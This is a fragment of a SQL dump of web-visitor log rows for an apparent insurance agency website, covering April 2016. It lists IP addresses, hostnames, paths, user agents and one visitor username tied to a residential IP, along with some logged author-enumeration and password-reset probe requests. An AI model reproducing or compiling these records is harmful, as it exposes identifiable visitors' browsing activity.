Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','au','1920 x 1080','','','','','','0','0',0),(12969,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459818264','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12972,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459818293','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12974,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459818308','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12975,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459818322','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(12977,'0b_def627facc42bbf42c259e2dacdc6295','1459818829','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(12980,'0b_96519e7189f8ca84bc42ed39b352a54f','1459818965','66.249.75.89','crawl-66-249-75-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(12983,'0b_1b3198ef681c31ecb70eb2b8a04f2413','1459818965','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(12986,'0b_b5cc3d3f88f1f895dca0a652de04bf6b','1459819410','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12989,'0b_08bea434baa6e6adc666c676bfeac9d1','1459819714','64.187.237.208','64-187-237-208.alnitech.com','/carriers/','Hotzonu/x.0','http://www.bing.com/search?q=[Life Insurance Carriers] + [New York New York] loc:US&filt=all&first=121&FORM=PERE','',0,'','','ru','','','Hotzonu','','','','3','0',0),(12990,'0b_8893dd2b42d6f93bdca03d84218dbb4a','1459822166','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(12992,'0b_8893dd2b42d6f93bdca03d84218dbb4a','1459822174','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(12993,'0b_8203a58962706f3edfc03c7015afda15','1459822259','76.186.50.29','cpe-76-186-50-29.tx.res.rr.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E233 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(12996,'0b_8203a58962706f3edfc03c7015afda15','1459822260','76.186.50.29','cpe-76-186-50-29.tx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E233 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(12999,'0b_8203a58962706f3edfc03c7015afda15','1459822275','76.186.50.29','cpe-76-186-50-29.tx.res.rr.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E233 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(13001,'0b_8203a58962706f3edfc03c7015afda15','1459822276','76.186.50.29','cpe-76-186-50-29.tx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E233 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(13004,'0b_8bd00a0f9804b7564d00513f57454c67','1459825535','212.113.47.89','mail.sollertis.com.ua','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','0','0',0),(13007,'0b_8bd00a0f9804b7564d00513f57454c67','1459825538','212.113.47.89','mail.sollertis.com.ua','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','0','0',0),(13008,'0b_1112ceb534f5ec4dc355284b6211a39b','1459827916','64.187.237.196','64-187-237-196.alnitech.com','/comments/feed/','Aplix HTTP/1.0.1','http://www.empireins.com/carriers/','',0,'','','ru','','','Aplix','','','','0','0',0),(13010,'0b_cd6523da9e4af2093132b81c4228da1d','1459827926','64.187.237.196','64-187-237-196.alnitech.com','/carriers/feed/','Lynx/2.8.3dev.9 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6','http://www.empireins.com/carriers/','',0,'','Lynx 2','ru','','','Lynx','','','','0','0',0),(13011,'0b_3cacfade7f228207bf31d51d9c6e9f7e','1459827935','64.187.237.196','64-187-237-196.alnitech.com','/?p=185','Java1.0.21.0','http://www.empireins.com/carriers/','',0,'','','ru','','','Java1','','','','0','0',0),(13014,'0b_3cacfade7f228207bf31d51d9c6e9f7e','1459827936','64.187.237.196','64-187-237-196.alnitech.com','/carriers/','Java1.0.21.0','http://www.empireins.com/carriers/','',0,'','','ru','','','Java1','','','','0','0',0),(13017,'0b_3cacfade7f228207bf31d51d9c6e9f7e','1459827936','64.187.237.196','64-187-237-196.alnitech.com','/?p=185','Java1.0.21.0','http://www.empireins.com/carriers/','',0,'','','ru','','','Java1','','','','0','0',0),(13019,'0b_42a98e47a19d21cc040fbd40ed7359bd','1459827943','64.187.237.196','64-187-237-196.alnitech.com','/','Mozilla/4.61 [de] (OS/2; I)','http://www.empireins.com/carriers/','',0,'','Netscape 4','ru','','','','','','','0','0',0),(13022,'0b_2e59bc6dc45d418a06e96efadad8716e','1459827961','64.187.235.149','64-187-235-149.alnitech.com','/agent-tools/','Opera/9.23 (Windows NT 5.1; U; en)','http://www.empireins.com/carriers/','',0,'WinXP','Opera 9','ru','','','','','','','0','0',0),(13023,'0b_7a3c95f0d9a7e8cce928068d71a646ce','1459827972','64.187.235.149','64-187-235-149.alnitech.com','/register/','AmigaVoyager/3.4.4 (MorphOS/PPC native)','http://www.empireins.com/carriers/','',0,'','','ru','','','AmigaVoyager','','','','0','0',0),(13025,'0b_260887a769c9eb937f3407d287d04946','1459827980','64.187.235.149','64-187-235-149.alnitech.com','/','WordPress/x.x.x.x PHP/4.x.xx','http://www.empireins.com/carriers/','',0,'','','ru','','','WordPress','','','','0','0',0),(13026,'0b_5891a6c33810e1e2a6bbf124abb015c1','1459827987','64.187.235.149','64-187-235-149.alnitech.com','/about-us/','RX Bar','http://www.empireins.com/carriers/','',0,'','','ru','','','RX','','','','0','0',0),(13029,'0b_e461d93b186411a68aa871f4cfa19c76','1459827995','64.187.235.149','64-187-235-149.alnitech.com','/insentives/','Mozilla/4.76 [en] (X11; U; SunOS 5.7 sun4u)','http://www.empireins.com/carriers/','',0,'SunOS 5.7','Netscape 4','ru','','','','','','','0','0',0),(13032,'0b_619913299948c64c1cbef13fa746484a','1459828003','64.187.235.149','64-187-235-149.alnitech.com','/licensing-contracting/','Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Girafabot; girafabot at girafa dot com; http://www.girafa.com)','http://www.empireins.com/carriers/','',0,'WinNT','','ru','','','Girafabot','','','','0','0',0),(13034,'0b_048ea4e8ba55ed5e5e144f7b66233ad4','1459828012','64.187.235.149','64-187-235-149.alnitech.com','/contact/','Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)','http://www.empireins.com/carriers/','',0,'MacPPC','','ru','','','','','','','0','0',0),(13035,'0b_8adf4610a66f1cb3b761ed1ec17dc8c9','1459828030','64.187.235.149','64-187-235-149.alnitech.com','/?page_id=171?a=pwdreset','ICE Browser/5.05 (Java 1.4.0; Windows 2000 5.0 x86)','http://www.empireins.com/carriers/','',0,'Win2000','ICE 5','ru','','','','','','','0','0',0),(13037,'0b_68ba0f72a69ef6be09c8f4469a17d380','1459828040','64.187.235.149','64-187-235-149.alnitech.com','/?page_id=169','Opera/9.51 (Windows NT 5.1; U; en)','http://www.empireins.com/carriers/','',0,'WinXP','Opera 9','ru','','','','','','','3','0',0),(13040,'0b_68ba0f72a69ef6be09c8f4469a17d380','1459828041','64.187.235.149','64-187-235-149.alnitech.com','/register/','Opera/9.51 (Windows NT 5.1; U; en)','http://www.empireins.com/carriers/','',0,'WinXP','Opera 9','ru','','','','','','','3','0',0),(13041,'0b_68ba0f72a69ef6be09c8f4469a17d380','1459828042','64.187.235.149','64-187-235-149.alnitech.com','/?page_id=169','Opera/9.51 (Windows NT 5.1; U; en)','http://www.empireins.com/carriers/','',0,'WinXP','Opera 9','ru','','','','','','','3','0',0),(13044,'0b_68ba0f72a69ef6be09c8f4469a17d380','1459828042','64.187.235.149','64-187-235-149.alnitech.com','/register/','Opera/9.51 (Windows NT 5.1; U; en)','http://www.empireins.com/carriers/','',0,'WinXP','Opera 9','ru','','','','','','','3','0',0),(13046,'0b_a8a9279dcc780eaf70c085c385317775','1459828050','64.187.235.149','64-187-235-149.alnitech.com','/thankyou/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; N_o_k_i_a)','http://www.empireins.com/carriers/','',0,'Win2000','IE 5','ru','','','','','','','0','0',0),(13047,'0b_7a64f7007a196bec75b8dcb8b108cb1b','1459828058','64.187.235.149','64-187-235-149.alnitech.com','/error/','Mozilla/3.0 (WinNT; I)','http://www.empireins.com/carriers/','',0,'WinNT','Netscape 3','ru','','','','','','','0','0',0),(13049,'0b_d698a9b5b5a48936a39b6540e09cb92f','1459828065','64.187.235.149','64-187-235-149.alnitech.com','/case-status/','Opera/5.0 (Linux 2.0.38 i386; U) [en]','http://www.empireins.com/carriers/','',0,'Linux','Opera 5','ru','','','','','','','0','0',0),(13050,'0b_4ca667a44ac4d0fa0508be93632a4c77','1459828072','64.187.235.149','64-187-235-149.alnitech.com','/forms/','Mozilla/3.0 (compatible; AvantGo 3.2)','http://www.empireins.com/carriers/','',0,'','AvantGo 3','ru','','','','','','','0','0',0),(13053,'0b_4ca667a44ac4d0fa0508be93632a4c77','1459828079','64.187.235.149','64-187-235-149.alnitech.com','/igo/','Mozilla/3.0 (compatible; AvantGo 3.2)','http://www.empireins.com/carriers/','',0,'','AvantGo 3','ru','','','','','','','0','0',0),(13055,'0b_7b538e8ec9e3bbf3ba21edb60c0d11e5','1459828087','64.187.235.149','64-187-235-149.alnitech.com','/term-quotes/','NSPlayer/10.0.0.xxxx WMFSDK/10.0','http://www.empireins.com/carriers/','',0,'','','ru','','','NSPlayer','','','','0','0',0),(13058,'0b_d2c61bf57ee8a181749ff46126a357b3','1459828097','64.187.235.149','64-187-235-149.alnitech.com','/carriers/','Mozilla/5.0 (Windows; U; Win98; en-US; rv:x.xx) Gecko/20030423 Firebird Browser/0.6','http://www.empireins.com/carriers/','',0,'Win98','Firebird Browser 0.6','ru','','','','','','','0','0',0),(13061,'0b_0f852e5c569f9b153c30f456b8a93687','1459828106','64.187.235.149','64-187-235-149.alnitech.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; NetCaptor 6.5.0RC1)','http://www.empireins.com/carriers/','',0,'Win2000','IE 5','ru','','','','','','','0','0',0),(13062,'0b_ef2dc8fa9b7999844891bd48408b6cd6','1459828113','64.187.235.149','64-187-235-149.alnitech.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','UdmSearch/3.1.x','http://www.empireins.com/carriers/','',0,'','','ru','','','mnoGoSearch','','','','0','0',0),(13065,'0b_f218fe94ffe71a9a675bda620470aba9','1459828121','64.187.235.149','64-187-235-149.alnitech.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/3.x (I-Opener 1.1; Netpliance)','http://www.empireins.com/carriers/','',0,'','','ru','','','','','','','0','0',0),(13067,'0b_369f71039c2c852b6da15a3b042bafbe','1459828130','64.187.235.149','64-187-235-149.alnitech.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Express WebPictures (www.express-soft.com)','http://www.empireins.com/carriers/','',0,'','','ru','','','Express','','','','0','0',0),(13070,'0b_77ca9fdb41aca228471eca9674ce6ea4','1459828139','64.187.235.149','64-187-235-149.alnitech.com','/carriers/','Java1.0.21.0','http://www.empireins.com/carriers/','',0,'','','ru','','','Java1','','','','0','0',0),(13073,'0b_596cefdf29fad5148d357ee1189aaade','1459833535','213.251.184.38','ns322237.ip-213-251-184.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(13074,'0b_596cefdf29fad5148d357ee1189aaade','1459833540','213.251.184.38','ns322237.ip-213-251-184.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(13076,'0b_618488e4a83ab19f9999877c05629ac0','1459834902','46.165.197.142','46.165.197.142','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(13077,'0b_618488e4a83ab19f9999877c05629ac0','1459834959','46.165.197.142','46.165.197.142','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13079,'0b_618488e4a83ab19f9999877c05629ac0','1459834970','46.165.197.142','46.165.197.142','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13082,'0b_618488e4a83ab19f9999877c05629ac0','1459834982','46.165.197.142','46.165.197.142','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13083,'0b_dd20ab11d0cca417b5a3b0c627321654','1459839139','66.249.75.96','crawl-66-249-75-96.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13085,'0b_47850baf999b5e4cabbbf55c32bcc9bc','1459841404','89.145.95.39','centro-39.grapeshot.co.uk','/','Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php)','','',0,'','','gb','','','','','','','0','0',0),(13086,'0b_dabf3264d69e62d458e123e6e766265d','1459841964','165.255.94.104','165-255-94-104.ip.adsl.co.za','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.co.za/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiUk_3t_vbLAhVM2BoKHTTfDWoQFgg-MAE&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg','',0,'Win7 x64','IE 11','za','1477 x 831','','','','','','0','0',0),(13088,'0b_dabf3264d69e62d458e123e6e766265d','1459841969','165.255.94.104','165-255-94-104.ip.adsl.co.za','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','za','1477 x 831','','','','','','0','0',0),(13089,'0b_dabf3264d69e62d458e123e6e766265d','1459842025','165.255.94.104','165-255-94-104.ip.adsl.co.za','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','za','1477 x 831','','','','','','0','0',0),(13091,'0b_dabf3264d69e62d458e123e6e766265d','1459842030','165.255.94.104','165-255-94-104.ip.adsl.co.za','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','za','1477 x 831','','','','','','0','0',0),(13092,'0b_732325adf74f990dd6bdf05fe7b2205d','1459842201','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(13094,'0b_880f70c2f439304ca5a9820b5857bc71','1459843545','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/sso/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13097,'0b_002a76051867f4ae4b1cbf9c4d6f20cf','1459845897','50.19.173.26','ec2-50-19-173-26.compute-1.amazonaws.com','[404] /pdf/bankers_companies_ok_to_convert_from.pdf','User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31','','',0,'Win7','','','','','Internet','','','','0','0',0),(13098,'0b_f6526b1901e63556f2b928ae7c2b77ff','1459847705','79.143.180.15','mail.ruddog.eu','/','Wget/1.13.4 (linux-gnu)','','',0,'','Wget 1','eu','','','Wget','','','','0','0',0),(13100,'0b_eb11b9d66de2e8f6b8326f78b818f936','1459850059','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(13103,'0b_3a68fd2ced0788a8055447809ab068e0','1459850065','100.43.91.1','spider-100-43-91-1.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(13106,'0b_1a752550cb2f7ec60095307df5fb593b','1459854292','66.249.75.96','crawl-66-249-75-96.googlebot.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(13109,'0b_b33ed6e84c822a1b01ff2025f768357b','1459854975','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13110,'0b_afb8e0a0394a4796112d4fe2c51c10bc','1459855505','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(13112,'0b_afb8e0a0394a4796112d4fe2c51c10bc','1459855516','69.30.213.82','69.30.213.82','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13115,'0b_806d14c2536d250156a764a9e9f9eb44','1459860473','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13116,'0b_806d14c2536d250156a764a9e9f9eb44','1459860585','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13119,'0b_806d14c2536d250156a764a9e9f9eb44','1459860594','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13121,'0b_47c6db34b0dd06a9dd7a80527aae0175','1459860637','141.8.143.235','spider-141-8-143-235.yandex.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(13122,'0b_7bb0928ea0e1fd95291638c692f37953','1459860638','104.178.132.163','104-178-132-163.lightspeed.nsvltn.sbcglobal.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(13125,'0b_7bb0928ea0e1fd95291638c692f37953','1459860638','104.178.132.163','104-178-132-163.lightspeed.nsvltn.sbcglobal.net','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(13127,'0b_7bb0928ea0e1fd95291638c692f37953','1459860639','104.178.132.163','104-178-132-163.lightspeed.nsvltn.sbcglobal.net','/?author=2','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(13130,'0b_b4904766d348d96b36320aaa0e2e91d4','1459860783','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(13131,'0b_b4904766d348d96b36320aaa0e2e91d4','1459860784','68.180.230.123','b115363.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(13133,'0b_143e3d8db6ba60101e3ca095116354af','1459861131','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13134,'0b_52fc66473f114567ca8371452d1522e7','1459861262','69.30.214.38','69.30.214.38','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(13136,'0b_52fc66473f114567ca8371452d1522e7','1459861275','69.30.214.38','69.30.214.38','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13137,'0b_52fc66473f114567ca8371452d1522e7','1459861286','69.30.214.38','69.30.214.38','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13139,'0b_52fc66473f114567ca8371452d1522e7','1459861300','69.30.214.38','69.30.214.38','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13140,'0b_52fc66473f114567ca8371452d1522e7','1459861311','69.30.214.38','69.30.214.38','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13143,'0b_52fc66473f114567ca8371452d1522e7','1459861322','69.30.214.38','69.30.214.38','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(13146,'0b_dbe032c323299ef249e5f5dba93a84e3','1459861452','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13148,'0b_dbe032c323299ef249e5f5dba93a84e3','1459861453','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13151,'0b_dbe032c323299ef249e5f5dba93a84e3','1459861455','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13154,'0b_ede8267b7dec284ce85a423c4a53dc83','1459862898','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13157,'0b_ede8267b7dec284ce85a423c4a53dc83','1459862900','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13158,'0b_4d104d1e58d9dc115652d9690f88ea18','1459863262','37.21.140.226','37.21.140.226','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(13161,'0b_8c851e9ac834e490c02212408c591f74','1459864843','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13164,'0b_d8132195c3ba232dce6701631885b6df','1459865794','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(13166,'0b_d45537a6459299407038fd0c066f1207','1459867043','45.55.44.84','45.55.44.84','/robots.txt','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(13169,'0b_d45537a6459299407038fd0c066f1207','1459867054','45.55.44.84','45.55.44.84','/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(13172,'0b_d45537a6459299407038fd0c066f1207','1459867065','45.55.44.84','45.55.44.84','/igo/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13175,'0b_d45537a6459299407038fd0c066f1207','1459867081','45.55.44.84','45.55.44.84','/forms/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13178,'0b_d45537a6459299407038fd0c066f1207','1459867092','45.55.44.84','45.55.44.84','/contact/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13179,'0b_d45537a6459299407038fd0c066f1207','1459867103','45.55.44.84','45.55.44.84','/about-us/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13182,'0b_d45537a6459299407038fd0c066f1207','1459867114','45.55.44.84','45.55.44.84','/carriers/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot 